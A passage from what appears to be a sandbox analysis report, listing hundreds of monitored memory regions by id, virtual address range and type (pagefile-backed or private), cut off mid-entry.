region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8433 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8434 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8435 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8436 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8437 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8438 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8439 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8440 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8441 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8442 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8443 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8444 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8445 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8446 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8447 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8448 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8449 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8450 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8451 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8452 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8453 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8454 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8455 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8456 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8457 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8458 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8459 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8460 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8461 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8462 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8463 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8464 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8465 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8466 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8467 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8468 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8469 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8470 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8471 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8472 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8473 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8474 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8475 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8476 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8477 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8478 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8479 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8480 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8481 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8482 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8483 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8484 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8485 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8486 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8487 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8488 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8489 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8490 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8491 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8492 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8514 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8515 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8516 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8517 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8518 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8519 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8520 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8521 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8522 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8523 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8524 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8525 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8526 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8527 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8528 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8529 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8530 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8531 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8532 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8533 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8534 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8535 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8536 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8537 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8538 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8539 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8540 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8541 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8542 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8543 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8544 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8545 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8546 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8547 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8548 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8549 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8550 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8551 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8552 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8553 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8554 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8555 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8556 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8557 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8558 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8559 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8560 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8561 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8562 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8563 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8564 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8565 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8566 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8567 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8568 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8569 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8570 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8571 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8572 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8573 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8574 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8575 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8576 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8577 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8578 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8579 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8580 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8581 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8582 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8583 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8584 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8585 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8586 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8587 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8588 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8589 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8590 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8591 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8592 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8593 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8594 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8595 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8596 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8597 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8598 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8599 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8600 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8601 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8602 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8603 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8604 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8606 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8607 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8608 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8609 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8610 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8611 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8612 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8613 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8614 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8615 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8616 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8617 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8618 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8619 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8620 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8621 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8622 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8623 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8624 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8625 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8626 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8627 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8628 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8629 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8630 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8631 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8632 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8633 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8634 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8635 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8636 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8637 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8638 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8639 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8653 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8654 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8655 start_va = 0xce0000 end_va 